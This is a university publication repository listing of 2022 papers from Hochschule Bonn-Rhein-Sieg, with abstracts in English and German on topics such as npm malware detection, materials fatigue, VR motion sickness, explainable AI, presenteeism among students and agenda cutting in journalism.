Refine
H-BRS Bibliography
- yes (138)
Departments, institutes and facilities
- Fachbereich Angewandte Naturwissenschaften (33)
- Fachbereich Wirtschaftswissenschaften (31)
- Fachbereich Ingenieurwissenschaften und Kommunikation (26)
- Fachbereich Informatik (22)
- Institut für Technik, Ressourcenschonung und Energieeffizienz (TREE) (22)
- Internationales Zentrum für Nachhaltige Entwicklung (IZNE) (16)
- Institut für Medienentwicklung und -analyse (IMEA) (10)
- Institut für funktionale Gen-Analytik (IFGA) (10)
- Fachbereich Sozialpolitik und Soziale Sicherung (9)
- Institut für Sicherheitsforschung (ISF) (7)
Document Type
- Article (88)
- Part of a Book (18)
- Conference Object (13)
- Bachelor Thesis (5)
- Report (4)
- Part of Periodical (3)
- Working Paper (3)
- Book review (2)
- Book (monograph, edited volume) (1)
- Master's Thesis (1)
Year of publication
- 2022 (138) (remove)
Has Fulltext
- yes (138) (remove)
Keywords
- Knowledge Graphs (3)
- Machine Learning (3)
- Well-being (3)
- relaxation (3)
- Agil (2)
- Agilität (2)
- Bioinformatics (2)
- IT-Controlling (2)
- IT-Projektmanagement (2)
- Kanban (2)
Während sich die unternehmerische Arbeitswelt immer mehr in Richtung Agilität verschiebt, verharrt das IT-Controlling noch in alten, klassischen Strukturen. Diese Arbeit untersucht die Fragestellung, ob und inwieweit agile Ansätze im IT-Controlling eingesetzt werden können. Dieser Beitrag ist eine modifizierte Version des in der Zeitschrift „HMD Praxis der Wirtschaftsinformatik“ (https://link.springer.com/article/10.1365/s40702-022-00837-0) erschienenen Artikels „Agiles IT-Controlling“.
Trojanized software packages used in software supply chain attacks constitute an emerging threat. Unfortunately, there is still a lack of scalable approaches that allow automated and timely detection of malicious software packages and thus most detections are based on manual labor and expertise. However, it has been observed that most attack campaigns comprise multiple packages that share the same or similar malicious code. We leverage that fact to automatically reproduce manually identified clusters of known malicious packages that have been used in real world attacks, thus, reducing the need for expert knowledge and manual inspection. Our approach, AST Clustering using MCL to mimic Expertise (ACME), yields promising results with a 𝐹1 score of 0.99. Signatures are automatically generated based on characteristic code fragments from clusters and are subsequently used to scan the whole npm registry for unreported malicious packages. We are able to identify and report six malicious packages that have been removed from npm consequentially. Therefore, our approach can support the detection by reducing manual labor and hence may be employed by maintainers of package repositories to detect possible software supply chain attacks through trojanized software packages.
Guzzo et al. (Reference Guzzo, Schneider and Nalbantian2022) argue that open science practices may marginalize inductive and abductive research and preclude leveraging big data for scientific research. We share their assessment that the hypothetico-deductive paradigm has limitations (see also Staw, Reference Staw2016) and that big data provide grand opportunities (see also Oswald et al., Reference Oswald, Behrend, Putka and Sinar2020). However, we arrive at very different conclusions. Rather than opposing open science practices that build on a hypothetico-deductive paradigm, we should take initiative to do open science in a way compatible with the very nature of our discipline, namely by incorporating ambiguity and inductive decision-making. In this commentary, we (a) argue that inductive elements are necessary for research in naturalistic field settings across different stages of the research process, (b) discuss some misconceptions of open science practices that hide or discourage inductive elements, and (c) propose that field researchers can take ownership of open science in a way that embraces ambiguity and induction. We use an example research study to illustrate our points.
Einleitung
(2022)
Buch-Diskurse
(2022)
Vorwort
(2022)
Medien-›Eingriffe‹
(2022)
Was ist ein Labor?
(2022)
Vorwort
(2022)
Bonding wires made of aluminum are the most used materials for the transmission of electrical signals in power electronic devices. During operation, different cyclic mechanical and thermal stresses can lead to fatigue loads and a failure of the bonding wires. A prediction or prevention of the wire failure is not yet possible by design for all cases. The following work presents meaningful fatigue tests in small wire dimensions and investigates the influence of the R-ratio on the lifetime of two different aluminum wires with a diameter of 300 μm each. The experiments show very reproducible fatigue results with ductile failure behavior. The endurable stress amplitude decreases linearly with an increasing stress ratio, which can be displayed by a Smith diagram, even though the applied maximum stresses exceed the initial yield stresses determined by tensile tests. A scaling of the fatigue results by the tensile strength indicates that the fatigue level is significantly influenced by the strength of the material. Due to the very consistent findings, the development of a generalized fatigue model for predicting the lifetime of bonding wires with an arbitrary loading situation seems to be possible and will be further investigated.
In young adulthood, important foundations are laid for health later in life. Hence, more attention should be paid to the health measures concerning students. A research field that is relevant to health but hitherto somewhat neglected in the student context is the phenomenon of presenteeism. Presenteeism refers to working despite illness and is associated with negative health and work-related effects. The study attempts to bridge the research gap regarding students and examines the effects of and reasons for this behavior. The consequences of digital learning on presenteeism behavior are moreover considered. A student survey (N = 1036) and qualitative interviews (N = 11) were conducted. The results of the quantitative study show significant negative relationships between presenteeism and health status, well-being, and ability to study. An increased experience of stress and a low level of detachment as characteristics of digital learning also show significant relationships with presenteeism. The qualitative interviews highlighted the aspect of not wanting to miss anything as the most important reason for presenteeism. The results provide useful insights for developing countermeasures to be easily integrated into university life, such as establishing fixed learning partners or the use of additional digital learning material.
Deployment of modern data-driven machine learning methods, most often realized by deep neural networks (DNNs), in safety-critical applications such as health care, industrial plant control, or autonomous driving is highly challenging due to numerous model-inherent shortcomings. These shortcomings are diverse and range from a lack of generalization over insufficient interpretability and implausible predictions to directed attacks by means of malicious inputs. Cyber-physical systems employing DNNs are therefore likely to suffer from so-called safety concerns, properties that preclude their deployment as no argument or experimental setup can help to assess the remaining risk. In recent years, an abundance of state-of-the-art techniques aiming to address these safety concerns has emerged. This chapter provides a structured and broad overview of them. We first identify categories of insufficiencies to then describe research activities aiming at their detection, quantification, or mitigation. Our work addresses machine learning experts and safety engineers alike: The former ones might profit from the broad range of machine learning topics covered and discussions on limitations of recent methods. The latter ones might gain insights into the specifics of modern machine learning methods. We hope that this contribution fuels discussions on desiderata for machine learning systems and strategies on how to help to advance existing approaches accordingly.
In the field of automatic music generation, one of the greatest challenges is the consistent generation of pieces continuously perceived positively by the majority of the audience since there is no objective method to determine the quality of a musical composition. However, composing principles, which have been refined for millennia, have shaped the core characteristics of today's music. A hybrid music generation system, mlmusic, that incorporates various static, music-theory-based methods, as well as data-driven, subsystems, is implemented to automatically generate pieces considered acceptable by the average listener. Initially, a MIDI dataset, consisting of over 100 hand-picked pieces of various styles and complexities, is analysed using basic music theory principles, and the abstracted information is fed into explicitly constrained LSTM networks. For chord progressions, each individual network is specifically trained on a given sequence length, while phrases are created by consecutively predicting the notes' offset, pitch and duration. Using these outputs as a composition's foundation, additional musical elements, along with constrained recurrent rhythmic and tonal patterns, are statically generated. Although no survey regarding the pieces' reception could be carried out, the successful generation of numerous compositions of varying complexities suggests that the integration of these fundamentally distinctive approaches might lead to success in other branches.
This study investigates the initial stage of the thermo-mechanical crystallization behavior for uni- and biaxially stretched polyethylene. The models are based on a mesoscale molecular dynamics approach. We take constraints that occur in real-life polymer processing into account, especially with respect to the blowing stage of the extrusion blow-molding process. For this purpose, we deform our systems using a wide range of stretching levels before they are quenched. We discuss the effects of the stretching procedures on the micro-mechanical state of the systems, characterized by entanglement behavior and nematic ordering of chain segments. For the cooling stage, we use two different approaches which allow for free or hindered shrinkage, respectively. During cooling, crystallization kinetics are monitored: We precisely evaluate how the interplay of chain length, temperature, local entanglements and orientation of chain segments influence crystallization behavior. Our models reveal that the main stretching direction dominates microscopic states of the different systems. We are able to show that crystallization mainly depends on the (dis-)entanglement behavior. Nematic ordering plays a secondary role.
Modeling of Creep Behavior of Particulate Composites with Focus on Interfacial Adhesion Effect
(2022)
Evaluation of creep compliance of particulate composites using empirical models always provides parameters depending on initial stress and material composition. The effort spent to connect model parameters with physical properties has not resulted in success yet. Further, during the creep, delamination between matrix and filler may occur depending on time and initial stress, reducing an interface adhesion and load transfer to filler particles. In this paper, the creep compliance curves of glass beads reinforced poly(butylene terephthalate) composites were fitted with Burgers and Findley models providing different sets of time-dependent model parameters for each initial stress. Despite the finding that the Findley model performs well in a primary creep, the Burgers model is more suitable if secondary creep comes into play; they allow only for a qualitative prediction of creep behavior because the interface adhesion and its time dependency is an implicit, hidden parameter. As Young’s modulus is a parameter of these models (and the majority of other creep models), it was selected to be introduced as a filler content-dependent parameter with the help of the cube in cube elementary volume approach of Paul. The analysis led to the time-dependent creep compliance that depends only on the time-dependent creep of the matrix and the normalized particle distance (or the filler volume content), and it allowed accounting for the adhesion effect. Comparison with the experimental data confirmed that the elementary volume-based creep compliance function can be used to predict the realistic creep behavior of particulate composites.
Silicon carbide and graphene possess extraordinary chemical and physical properties. Here, these different systems are linked and the changes in structural and dynamic properties are investigated. For the simulations performed a classical molecular dynamic (MD) approach was used. In this approach, a graphene layer (N = 240 atoms) was grafted at different distances on top of a 6H-SiC structure (N = 2400 atoms) and onto a 3C-SiC structure (N = 1728 atoms). The distances between the graphene and the 6H are 1.0, 1.3 and 1.5 Å and the distances between the graphene layer and the 3C-SiC are 2.0, 2.3, and 2.5 Å. Each system has been equilibrated at room temperature until no further relaxation was observed. The 6H-SiC structure in combination with graphene proves to be more stable compared to the combination with 3C-SiC. This can be seen well in the determined energies. Pair distribution functions were influenced slightly by the graphene layer due to steric and energetic changes. This becomes clear from the small shifts of the C-C distances. Interactions as well as bonds between graphene and SiC lead to the fact that small shoulders of the high-frequency SiC-peaks are visible in the spectra and at the same time the high-frequency peaks of graphene are completely absent.
Die folgenden Überlegungen versuchen einerseits, die Arbeit an einer ins besondere medienwissenschaftlich fundierten Auslegung der sogenannten Kriminalliteratur1 weiter zu denken und in den Zusammenhang einer Lektüre zu stellen, die das Dispositiv ›Literatur und ihre Medien‹ als Bezugnahme bzw. Verhältnismäßigkeit versteht: als »Verhältnis der Literatur zu ihren Medien« und/oder als »Verhältnis der Medien zur Literatur«.2
Due to expected positive impacts on business, the application of artificial intelligence has been widely increased. The decision-making procedures of those models are often complex and not easily understandable to the company’s stakeholders, i.e. the people having to follow up on recommendations or try to understand automated decisions of a system. This opaqueness and black-box nature might hinder adoption, as users struggle to make sense and trust the predictions of AI models. Recent research on eXplainable Artificial Intelligence (XAI) focused mainly on explaining the models to AI experts with the purpose of debugging and improving the performance of the models. In this article, we explore how such systems could be made explainable to the stakeholders. For doing so, we propose a new convolutional neural network (CNN)-based explainable predictive model for product backorder prediction in inventory management. Backorders are orders that customers place for products that are currently not in stock. The company now takes the risk to produce or acquire the backordered products while in the meantime, customers can cancel their orders if that takes too long, leaving the company with unsold items in their inventory. Hence, for their strategic inventory management, companies need to make decisions based on assumptions. Our argument is that these tasks can be improved by offering explanations for AI recommendations. Hence, our research investigates how such explanations could be provided, employing Shapley additive explanations to explain the overall models’ priority in decision-making. Besides that, we introduce locally interpretable surrogate models that can explain any individual prediction of a model. The experimental results demonstrate effectiveness in predicting backorders in terms of standard evaluation metrics and outperform known related works with AUC 0.9489. Our approach demonstrates how current limitations of predictive technologies can be addressed in the business domain.
Robust Identification and Segmentation of the Outer Skin Layers in Volumetric Fingerprint Data
(2022)
Despite the long history of fingerprint biometrics and its use to authenticate individuals, there are still some unsolved challenges with fingerprint acquisition and presentation attack detection (PAD). Currently available commercial fingerprint capture devices struggle with non-ideal skin conditions, including soft skin in infants. They are also susceptible to presentation attacks, which limits their applicability in unsupervised scenarios such as border control. Optical coherence tomography (OCT) could be a promising solution to these problems. In this work, we propose a digital signal processing chain for segmenting two complementary fingerprints from the same OCT fingertip scan: One fingerprint is captured as usual from the epidermis (“outer fingerprint”), whereas the other is taken from inside the skin, at the junction between the epidermis and the underlying dermis (“inner fingerprint”). The resulting 3D fingerprints are then converted to a conventional 2D grayscale representation from which minutiae points can be extracted using existing methods. Our approach is device-independent and has been proven to work with two different time domain OCT scanners. Using efficient GPGPU computing, it took less than a second to process an entire gigabyte of OCT data. To validate the results, we captured OCT fingerprints of 130 individual fingers and compared them with conventional 2D fingerprints of the same fingers. We found that both the outer and inner OCT fingerprints were backward compatible with conventional 2D fingerprints, with the inner fingerprint generally being less damaged and, therefore, more reliable.
The implementation of the Sustainable Development Goals (SDGs) and the conservation and protection of nature are among the greatest challenges facing urban regions. There are few approaches so far that link the SDGs to natural diversity and related ecosystem services at the local level and track them in terms of increasing sustainable development at the local level. We want to close this gap by developing a set of indicators that capture ecosystem services in the sense of the SDGs and which are based on data that are freely available throughout Germany and Europe. Based on 10 SDGs and 35 SDG indicators, we are developing an ecosystem service and biodiversity-related indicator set for the evaluation of sustainable development in urban areas. We further show that it is possible to close many of the data gaps between SDGs and locally collected data mentioned in the literature and to translate the universal SDGs to the local level. Our example develops this set of indicators for the Bonn/Rhein-Sieg metropolitan area in North Rhine-Westphalia, Germany, which comprises both rural and densely populated settlements. This set of indicators can also help improve communication and plan sustainable development by increasing transparency in local sustainability, implementing a visible sustainability monitoring system, and strengthening the collaboration between local stakeholders.
The visual and auditory quality of computer-mediated stimuli for virtual and extended reality (VR/XR) is rapidly improving. Still, it remains challenging to provide a fully embodied sensation and awareness of objects surrounding, approaching, or touching us in a 3D environment, though it can greatly aid task performance in a 3D user interface. For example, feedback can provide warning signals for potential collisions (e.g., bumping into an obstacle while navigating) or pinpointing areas where one’s attention should be directed to (e.g., points of interest or danger). These events inform our motor behaviour and are often associated with perception mechanisms associated with our so-called peripersonal and extrapersonal space models that relate our body to object distance, direction, and contact point/impact. We will discuss these references spaces to explain the role of different cues in our motor action responses that underlie 3D interaction tasks. However, providing proximity and collision cues can be challenging. Various full-body vibration systems have been developed that stimulate body parts other than the hands, but can have limitations in their applicability and feasibility due to their cost and effort to operate, as well as hygienic considerations associated with e.g., Covid-19. Informed by results of a prior study using low-frequencies for collision feedback, in this paper we look at an unobtrusive way to provide spatial, proximal and collision cues. Specifically, we assess the potential of foot sole stimulation to provide cues about object direction and relative distance, as well as collision direction and force of impact. Results indicate that in particular vibration-based stimuli could be useful within the frame of peripersonal and extrapersonal space perception that support 3DUI tasks. Current results favor the feedback combination of continuous vibrotactor cues for proximity, and bass-shaker cues for body collision. Results show that users could rather easily judge the different cues at a reasonably high granularity. This granularity may be sufficient to support common navigation tasks in a 3DUI.
SLC6A14 (ATB0,+) is unique among SLC proteins in its ability to transport 18 of the 20 proteinogenic (dipolar and cationic) amino acids and naturally occurring and synthetic analogues (including anti-viral prodrugs and nitric oxide synthase (NOS) inhibitors). SLC6A14 mediates amino acid uptake in multiple cell types where increased expression is associated with pathophysiological conditions including some cancers. Here, we investigated how a key position within the core LeuT-fold structure of SLC6A14 influences substrate specificity. Homology modelling and sequence analysis identified the transmembrane domain 3 residue V128 as equivalent to a position known to influence substrate specificity in distantly related SLC36 and SLC38 amino acid transporters. SLC6A14, with and without V128 mutations, was heterologously expressed and function determined by radiotracer solute uptake and electrophysiological measurement of transporter-associated current. Substituting the amino acid residue occupying the SLC6A14 128 position modified the binding pocket environment and selectively disrupted transport of cationic (but not dipolar) amino acids and related NOS inhibitors. By understanding the molecular basis of amino acid transporter substrate specificity we can improve knowledge of how this multi-functional transporter can be targeted and how the LeuT-fold facilitates such diversity in function among the SLC6 family and other SLC amino acid transporters.
The following work presents algorithms for semi-automatic validation, feature extraction and ranking of time series measurements acquired from MOX gas sensors. Semi-automatic measurement validation is accomplished by extending established curve similarity algorithms with a slope-based signature calculation. Furthermore, a feature-based ranking metric is introduced. It allows for individual prioritization of each feature and can be used to find the best performing sensors regarding multiple research questions. Finally, the functionality of the algorithms, as well as the developed software suite, are demonstrated with an exemplary scenario, illustrating how to find the most power-efficient MOX gas sensor in a data set collected during an extensive screening consisting of 16,320 measurements, all taken with different sensors at various temperatures and analytes.
The cube in cube approach was used by Paul and Ishai-Cohen to model and derive formulas for filler content dependent Young's moduli of particle filled composites assuming perfect filler matrix adhesion. Their formulas were chosen because of their simplicity, and recalculated using an elementary volume approach which transforms spherical inclusions to cubic inclusions. The EV approach led to expression of the composites moduli that allows introducing an adhesion factor kadh ranging from 0 and 1 to take into account reduced filler matrix adhesion. This adhesion factor scales the edge length of the cubic inclusions, thus reducing the stress transfer area between matrix and filler. Fitting the experimental data with the modified Paul model provides reasonable kadh for PA66, PBT, PP, PE-LD and BR which are in line with their surface energies. Further analysis showed that stiffening only occurs if kadh exceeds [Formula: see text] and depends on the ratio of matrix modulus and filler modulus. The modified model allows for a quick calculation of any particle filled composites for known matrix modulus EM, filler modulus EF, filler volume content vF and adhesion factor kadh. Thus, finite element analysis (FEA) simulations of any particle filled polymer parts as well as materials selection are significantly eased. FEA of cubic and hexagonal EV arrangements show that stress distributions within the EV exhibit more shear stresses if one deviates from the cubic arrangement. At high filler contents the assumption that the property of the EV is representative for the whole composite, holds only for filler volume contents up to 15 or 20% (corresponding to 30 to 40 weight %). Thus, for vast majority of commercially available particulate composites, the modified model can be applied. Furthermore, this indicates that the cube in cube approach reaches two limits: (i) the occurrence of increasing shear stresses at filler contents above 20% due to deviations of EV arrangements or spatial filler distribution from cubic arrangements (singular), and (ii) increasing interaction between particles with the formation of particle network within the matrix violating the EV assumption of their homogeneous dispersion.
The purpose of the study is to provide empirical evidence about the under-researched area of university–government relations in building a culture of entrepreneurial initiatives inside the triple helix model in a rural region. The study deploys a qualitative case study research method based on the content analysis of project documentation and further internal documents both from universities and municipalities. The propositions in the research question are guided by the previous literature and were then analyzed through an “open coding” process to iteratively analyze, verify, and validate the results from the documents against the previous literature. Results presented in the case study are related both to the project of a municipality–university innovation partnership, as well as the historic development of the university in its three missions, and, related to the important third mission, themes relevant for the project. In addition, a “toolkit” of relevant project activities is presented against the major identified themes, major project stakeholders, as well as relevant Sustainable Development Goals (SDGs). Universities should look beyond a purely economic contribution and should augment all three missions (teaching, research, engagement) by considering social, environmental, and economic aspects of its activities. Instead of considering a government’s role solely as that of a regulator, a much more creative and purposeful cooperation between university and government is possible for creating a regional culture of entrepreneurial initiatives in a rural region.
Shaping off-job life is becoming increasingly important for workers to increase and maintain their optimal functioning (i.e., feeling and performing well). Proactively shaping the job domain (referred to as job crafting) has been extensively studied, but crafting in the off-job domain has received markedly less research attention. Based on the Integrative Needs Model of Crafting, needs-based off-job crafting is defined as workers’ proactive and self-initiated changes in their off-job lives, which target psychological needs satisfaction. Off-job crafting is posited as a possible means for workers to fulfill their needs and enhance well-being and performance over time. We developed a new scale to measure off-job crafting and examined its relationships to optimal functioning in different work contexts in different regions around the world (the United States, Germany, Austria, Switzerland, Finland, Japan, and the United Kingdom). Furthermore, we examined the criterion, convergent, incremental, discriminant, and structural validity evidence of the Needs-based Off-job Crafting Scale using multiple methods (longitudinal and cross-sectional survey studies, an “example generation”-task). The results showed that off-job crafting was related to optimal functioning over time, especially in the off-job domain but also in the job domain. Moreover, the novel off-job crafting scale had good convergent and discriminant validity, internal consistency, and test–retest reliability. To conclude, our series of studies in various countries show that off-job crafting can enhance optimal functioning in different life domains and support people in performing their duties sustainably. Therefore, shaping off-job life may be beneficial in an intensified and continually changing and challenging working life.
From Conclusion to Coda
(2022)
Dass die weitgehende kommerzielle Datenausspähung der großen Internetunternehmen nicht allein ein Problem der davon betroffenen Bürgerinnen und Bürger ist, sondern letztlich auch weitreichende gesellschaftliche Folgen hat, wurde mit dem Aufkommen des Rechtspopulismus in den USA, Brasilien und Europa zum Thema mindestens der Diskussion in Fachkreisen. Hass und Hetze im Netz, Fake News, politische Wahlwerbung und Manipulation in Social Media sind als Bedrohung für die freiheitlichen Demokratien westlicher Ausprägung unübersehbar geworden.
Breaking new ground and setting new trends in research, teaching and transfer - this is what the Hochschule Bonn-Rhein-Sieg (H-BRS) managed to do last year despite the Corona pandemic. Talents, ideas and cooperations have come to fruition in various ways, always in close exchange between applied science, society and business. "expand" is therefore the motto of the annual report of the H-BRS for the year 2021, which has now been published.
Schulungen in neun Prozessschritten gestalten! Digitalisierung des Masterfaches „Integrierte Managementsysteme“ im Studiengang „Material Science and Sustainability Methods“ im Fachbereich Naturwissenschaften an der Hochschule Bonn-Rhein-Sieg. Am Beispiel einer jahrelang in Präsenz gelehrten Lehrveranstaltung mit Vorlesungen und seminaristischen Übungen wird gezeigt, wie das Gestalten und Durchführen zur Vermittlung prüfungsrelevanter Kompetenzen auch „online“ gelingt. Das passende „Setting“ des Lehr- und Lernprozesses unter Beachtung von Qualitätskriterien und Handlungsempfehlungen ist für jede Art von Schulung in Universitäten, Behörden, Unternehmen und anderen Organsitationen relevant.
Emotions are associated with the genesis of visually induced motion sickness in virtual reality
(2022)
Visually induced motion sickness (VIMS) is a well-known side effect of virtual reality (VR) immersion, with symptoms including nausea, disorientation, and oculomotor discomfort. Previous studies have shown that pleasant music, odor, and taste can mitigate VIMS symptomatology, but the mechanism by which this occurs remains unclear. We predicted that positive emotions influence the VIMS-reducing effects. To investigate this, we conducted an experimental study with 68 subjects divided into two groups. The groups were exposed to either positive or neutral emotions before and during the VIMS-provoking stimulus. Otherwise, they performed exactly the same task of estimating the time-to-contact while confronted with a VIMS-provoking moving starfield stimulation. Emotions were induced by means of pre-tested videos and with International Affective Picture System (IAPS) images embedded in the starfield simulation. We monitored emotion induction before, during, and after the simulation, using the Self-Assessment Manikin (SAM) valence and arousal scales. VIMS was assessed before and after exposure using the Simulator Sickness Questionnaire (SSQ) and during simulation using the Fast Motion Sickness Scale (FMS) and FMS-D for dizziness symptoms. VIMS symptomatology did not differ between groups, but valence and arousal were correlated with perceived VIMS symptoms. For instance, reported positive valence prior to VR exposure was found to be related to milder VIMS symptoms and, conversely, experienced symptoms during simulation were negatively related to subjects’ valence. This study sheds light on the complex and potentially bidirectional relationship of VIMS and emotions and provides starting points for further research on the use of positive emotions to prevent VIMS.
A precise characterization of substances is essential for the safe handling of explosives. One parameter regularly characterized is the impact sensitivity. This is typically determined using a drop hammer. However, the results can vary depending on the test method and even the operator, and it is not possible to distinguish the type of decomposition such as detonation and deflagration. This study monitors the reaction progress by constructing a drop hammer to measure the decomposition reaction of four different primary explosives (tetrazene, silver azide, lead azide, lead styphnate) in order to determine the reproducibility of this method. Additionally, further possible evaluation methods are explored to improve on the current binary statistical analysis. To determine whether classification was possible based on extracted features, the responses of equipped sensor arrays, which measure and monitor the reactions, were studied and evaluated. Features were extracted from this data and were evaluated using multivariate methods such as principal component analysis (PCA) and linear discriminant analysis (LDA). The results indicate that although the measurements show substance specific trends, they also show a large scatter for each substance. By reducing the dimensions of the extracted features, different sample clusters can be represented and the calculated loadings allow significant parameters to be determined for classification. The results also suggest that differentiation of different reaction mechanisms is feasible. Testing of the regressor function shows reliable results considering the comparatively small amount of data.
This paper investigates the effect of voltage sensors on the measurement of transient voltages for power semiconductors in a Double Pulse Test (DPT) environment.We adapt previously published models that were developed for current sensors and apply them to voltage sensors to evaluate their suitability for DPT applications. Similarities and differences between transient current and voltage sensors are investigated and the resulting methodology is applied to commercially available and experimental voltage sensors. Finally, a selection aid for given measurement tasks is derived that focuses on the measurement of fast-switching power semiconductors.
Cytokine-induced killer cells (CIK) in combination with dendritic cells (DCs) have shown favorable outcomes in renal cell carcinoma (RCC), yet some patients exhibit recurrence or no response to this therapy. In a broader perspective, enhancing the antitumor response of DC-CIK cells may help to address this issue. Considering this, herein, we investigated the effect of anti-CD40 and anti-CTLA-4 antibodies on the antitumor response of DC-CIK cells against RCC cell lines. Our analysis showed that, a) anti-CD40 antibody (G28.5) increased the CD3+CD56+ effector cells of CIK cells by promoting the maturation and activation of DCs, b) G28.5 also increased CTLA-4 expression in CIK cells via DCs, but the increase could be hindered by the CTLA-4 inhibitor (ipilimumab), c) adding ipilimumab was also able to significantly increase the proportion of CD3+CD56+ cells in DC-CIK cells, d) anti-CD40 antibodies predominated over anti-CTLA-4 antibodies for cytotoxicity, apoptotic effect and IFN-g secretion of DC-CIK cells against RCC cells, e) after ipilimumab treatment, the population of Tregs in CIK cells remained unaffected, but ipilimumab combined with G28.5 significantly reduced the expression of CD28 in CIK cells. Taken together, we suggest that the agonistic anti-CD40 antibody rather than CTLA-4 inhibitor may improve the antitumor response of DC-CIK cells, particularly in RCC. In addition, we pointed towards the yet to be known contribution of CD28 in the crosstalk between anti-CTLA-4 and CIK cells.
We describe a systematic approach for rendering time-varying simulation data produced by exa-scale simulations, using GPU workstations. The data sets we focus on use adaptive mesh refinement (AMR) to overcome memory bandwidth limitations by representing interesting regions in space with high detail. Particularly, our focus is on data sets where the AMR hierarchy is fixed and does not change over time. Our study is motivated by the NASA Exajet, a large computational fluid dynamics simulation of a civilian cargo aircraft that consists of 423 simulation time steps, each storing 2.5 GB of data per scalar field, amounting to a total of 4 TB. We present strategies for rendering this time series data set with smooth animation and at interactive rates using current generation GPUs. We start with an unoptimized baseline and step by step extend that to support fast streaming updates. Our approach demonstrates how to push current visualization workstations and modern visualization APIs to their limits to achieve interactive visualization of exa-scale time series data sets.
Jahresbericht 2021
(2022)
While many proteins are known clients of heat shock protein 90 (Hsp90), it is unclear whether the transcription factor, thyroid hormone receptor beta (TRb), interacts with Hsp90 to control hormonal perception and signaling. Higher Hsp90 expression in mouse fibroblasts was elicited by the addition of triiodothyronine (T3). T3 bound to Hsp90 and enhanced adenosine triphosphate (ATP) binding of Hsp90 due to a specific binding site for T3, as identified by molecular docking experiments. The binding of TRb to Hsp90 was prevented by T3 or by the thyroid mimetic sobetirome. Purified recombinant TRb trapped Hsp90 from cell lysate or purified Hsp90 in pull-down experiments. The affinity of Hsp90 for TRb was 124 nM. Furthermore, T3 induced the release of bound TRb from Hsp90, which was shown by streptavidin-conjugated quantum dot (SAv-QD) masking assay. The data indicate that the T3 interaction with TRb and Hsp90 may be an amplifier of the cellular stress response by blocking Hsp90 activity.
While the recent discussion on Art. 25 GDPR often considers the approach of data protection by design as an innovative idea, the notion of making data protection law more effective through requiring the data controller to implement the legal norms into the processing design is almost as old as the data protection debate. However, there is another, more recent shift in establishing the data protection by design approach through law, which is not yet understood to its fullest extent in the debate. Art. 25 GDPR requires the controller to not only implement the legal norms into the processing design but to do so in an effective manner. By explicitly declaring the effectiveness of the protection measures to be the legally required result, the legislator inevitably raises the question of which methods can be used to test and assure such efficacy. In our opinion, extending the legal compatibility assessment to the real effects of the required measures opens this approach to interdisciplinary methodologies. In this paper, we first summarise the current state of research on the methodology established in Art. 25 sect. 1 GDPR, and pinpoint some of the challenges of incorporating interdisciplinary research methodologies. On this premise, we present an empirical research methodology and first findings which offer one approach to answering the question on how to specify processing purposes effectively. Lastly, we discuss the implications of these findings for the legal interpretation of Art. 25 GDPR and related provisions, especially with respect to a more effective implementation of transparency and consent, and provide an outlook on possible next research steps.
In Forschung, Lehre und Transfer neue Wege beschreiten und Akzente setzen – das hat die Hochschule Bonn-Rhein-Sieg (H-BRS) im vergangenen Jahr trotz der Corona-Pandemie geschafft. Talente, Ideen und Kooperationen sind in unterschiedlicher Weise zur Geltung gekommen, stets im engen Austausch zwischen angewandter Wissenschaft, Gesellschaft und Wirtschaft. „Entfalten“ lautet deshalb das Motto des Jahresberichts der H-BRS für das Jahr 2021, der jetzt erschienen ist.
Discarded news
(2022)
When important news fail to reach their recipients, namely, the politically interested, socially open-minded public, we sometimes refer to this process as agenda cutting. This article presents the key theoretical positions on this under-researched phenomenon, presenting important study results as well as our own empirical findings on internal editorial decision-making processes whereby topics are removed from the agenda. Last, we will critically examine the role of the audience as an actor in agenda cutting, which could be described as »news ignorance«.[1]
The top story showcased by Initiative Nachrichtenaufklärung (INA) e.V. in 2022 was the creeping abolition of free textbooks in German schools. In a public radio broadcast, the head of TV news magazine Tagesthemen and deputy editor-in-chief of ARD-Aktuell, Helge Fuhst, conceded that he considered this topic highly relevant, yet it had indeed not been covered in his TV news program. »Leaving out topics is, in fact, the most difficult challenge,« Fuhst said. »Having to drop topics hurts every day. There are only a few days a year when we have absolutely no idea what to put on the air.« (WDR 2022)
The process of news selection is editorial routine, which includes omitting, discarding, or abandoning topics. When this negative process is intentional, it can also be referred to as agenda cutting. This term from the field of communications science describes a distinct form of editorial routine that has been little studied to date and whose mechanisms, with their considerable influence on the formation of public opinion, are in urgent need of media research scrutiny.
Ausrangierte Nachrichten
(2022)
Wichtige Nachrichten finden nicht ihre Bestimmung, nämlich das politisch interessierte und gesellschaftlich aufgeschlossene Publikum. Man kann diesen Vorgang als Agenda Cutting bezeichnen. Der Beitrag stellt die wichtigsten theoretischen Positionen zu diesem bislang noch wenig erforschten Phänomen dar, präsentiert wichtige Studienergebnisse und auch eigene empirische Ergebnisse zu innerredaktionellen Entscheidungsfindungsprozessen, bei denen Themen von der Agenda gestrichen werden. Zuletzt wird auch die Rolle des Publikums als Akteur beim Vorgang des Agenda Cuttings kritisch beleuchtet, die man als »news ignorance« beschreiben könnte.[1]
Die schleichende Abschaffung der Lernmittelfreiheit in den deutschen Bundesländern steht im Jahr 2022 auf Platz 1 der Top Ten der ›Vergessenen Nachrichten‹, die die Initiative Nachrichtenaufklärung (INA) e.V. jedes Jahr in die Öffentlichkeit lanciert. Der Chef des Fernsehnachrichtenmagazins Tagesthemen und stellvertretender Chefredakteur von ARD-Aktuell, Helge Fuhst, konzedierte in der Mediensendung eines öffentlich-rechtlichen Radiosenders, dass er dieses Thema für hochrelevant halte und es tatsächlich in seiner TV-Nachrichtensendung nicht behandelt worden sei. »Was das Schwierigste ist, ist tatsächlich Themen wegzulassen«, so Fuhst. »Es schmerzt uns jeden Tag, wenn wir Themen weglassen müssen. Es gibt wenige Tage im Laufe des Jahres, wo wir absolut keine Idee haben, was wir in die Sendung nehmen sollen« (WDR 2022).
Der Vorgang der Nachrichtenselektion ist redaktionelle Routine, und zu dieser Routine zählt auch, Themen wegzulassen, auszusortieren, fortzuschmeißen. Wenn dieser negative Prozess intentional erfolgt, kann man auch von Agenda Cutting sprechen. Dieser kommunikationswissenschaftliche Begriff beschreibt eine eigene Form redaktioneller Routine, die bislang nur wenig untersucht worden ist und deren Mechanismen mit ihrem erheblichen Einfluss auf die öffentliche Meinungsbildung dringend unter das Seziermesser der Medienforschung gehören.
